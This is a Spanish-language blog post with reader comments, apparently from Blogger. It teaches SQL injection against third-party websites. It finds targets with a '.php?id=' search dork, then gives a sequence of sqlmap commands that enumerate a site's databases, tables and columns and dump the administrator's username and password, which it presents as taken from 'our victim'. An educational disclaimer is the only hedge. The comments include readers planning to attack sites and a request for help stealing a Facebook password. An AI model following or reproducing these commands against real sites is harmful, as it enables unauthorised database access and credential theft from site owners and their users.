Ingresamos a nuestro navegador y entramos a www.google.com y escribimos lo siguiente:
.php?id=
una vez encontrados los sitios que terminan www.dominio.com/ejemplo.php?id=2 empezamos a buscar la vulnerabilidad de la pagina www.dominio.com/ejemplo.php?id=2' solo agregamos el signo al final de la url ' y esta nos mostrara un error en la web asi como nos muestra la imagen
Ahora empezamos con nuestro ataque. entramos en nuestro Backtarck en: Applications/BackTrack>Exploitation Tools>Web Exploitation Tools>sqlmap
ya abierta nuestra ventana empezamos a escribir lo siguiente:
1:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 --dbs
ya hecho esto nos arrojara las siguientes tablas así como se muestra en la imagen inferior
2:
Una vez que nos dio esos datos escogemos la ultima para seguir sacando datos de la pagina y escribimos lo siguiente:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db --tables
3:
Ya ingresando nos volverá a dar mas datos.
Ya que nuestro objetivo es sacar la el pass y el nombre de usuario de
nuestra pagina escogemos la tabla "usuarios" y escribimos lo siguiente
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios --columns
4:
Una vez obtenido os datos de "usuarios" escribimos lo siguiente:
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario --dump
5:
Bingo nos dio las tablas de usuario y password, entonces seguimos sacando datos de nuestra victima
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C usuario --dump
Perfecto =D nos dio el nombre del administrador de la pagina que es "admin"
6:
ahora solo nos falta es sacar el password del administrador y para eso escribimos lo siguiente asi como nos muestra la imagen de abajo
python sqlmap.py -u http://www.dominio.com/educacion_detalle.php?id=2 -D radla_db -T usuarios -C password --dump
Y BINGO..!!! nos dio el password de la pagina que es "desarrollo"
recuerden este es un tutorial de aprendizaje sobre como saber lo
vulnerable que son las paginas web y ver sus fallos, no
me responsabilizo sobre el mal uso que le lleguen a dar .
Espero q esta informacion se use adecuadamente!
ResponderEliminares realmente util para ver cualqier clase de fallos en situacion q se presente..
esto si esta buenisimo.. ojala los que los usen sean unos white hat... (Y)..
ResponderEliminareso es legal????????
ResponderEliminareso si esta buenisimo la primera q voy a crackear es este blog
ResponderEliminarjajajaja eso si me intereso bastante
Para hackear Redtube jajajaja
ResponderEliminarCuando le coloco ' al final de la url y la cargo me tira a la misma página y no sale ningún error =P
ResponderEliminaresto esta muy muy interesante y bueno!! espero sigamos aprendiendo mas!!
ResponderEliminares muy interesante sabiendo esto no solo podemos acceder a paginas web...
ResponderEliminarsino tambien podemos proteger nuestras paginas... o no???
esto si es muy interesante..!!
ResponderEliminarKe bien... pero si se dan cuenta que sacaron informacion de la base de datos ke sucedera con kien lo hizo..?
ResponderEliminaren donde (en que parte) ba escrito todo eso?
ResponderEliminartodo esos codigos en donde se colocan
ResponderEliminarjairo xq solo pensas en ese tipo de pag pz... existen otras a las q se puede sacar informacion buena o mala depende q objetivos y necesidades tangamos. Servira de mucho
ResponderEliminarQ pasaria si nos faltara un paso de estos aparte de que no funcionara?????
ResponderEliminaresto se mira facil espero que podamos aprender mas y
ResponderEliminares muy interesante sabiendo esto no solo podemos acceder a paginas web...
sino tambien podemos proteger nuestras paginas
ya me imagino se un cracker de lo interesante que es.
ResponderEliminardonde se pone los codigos?
ResponderEliminartodo esto es muy interesante espero que aprendamos todo
ResponderEliminares muy interesante pero pork se escribe .php?id=
ResponderEliminarprof en donde se escribe todo eso???
ResponderEliminartodo esta bueno solo que se legal
ResponderEliminartodo esta bueno solo que se legal
ResponderEliminarTengo Un Problema Cuando le Pongo El (php?id=2') Me Vuelve Ha Cargar La Misma Pag
ResponderEliminarY si la contraseña esta encriptada?
ResponderEliminarDISCULPA QISIERA QUE POR FAVOR ME AYUDARAS...TENGO UN PROBLEMA SERA POSIBLE QUE PUDIERAS HACER...UN TUTORIAL..POR FAVOR LO NECESITO ES QUE...LA COSA ES QUE BUSQUE PROGRAMAS QUE ME AYUDARAN A HACKEAR FACEBOOK PERO NINGUNO ME FUNCIONO
ResponderEliminarPERO YO NO LO QIERO PARA MOLESTAR A LA GENTE O ROBAR SINO ES QUE MI PRIMA LA SECUESTRARON Y TENEMOS SOSPECHAS DE QUE LE HABLARON MEDIANTE FACEBOOK...POR FAVOR PUDIERAS ACER UN VIDEO EXCLUSIVO COMO ROBAR LA CONTRASEÑA PORFAVOR....LA ESTAMOS BUSCANDO DESDE HACE UN MES TE LO AGRADECERIA DE CORAZON
A Y SE ME OLVIDABA PUDIERA SER UN VIDEO COMPLETO DESDE DONDE DEBO EMPEZAR PORFAVOR
ResponderEliminar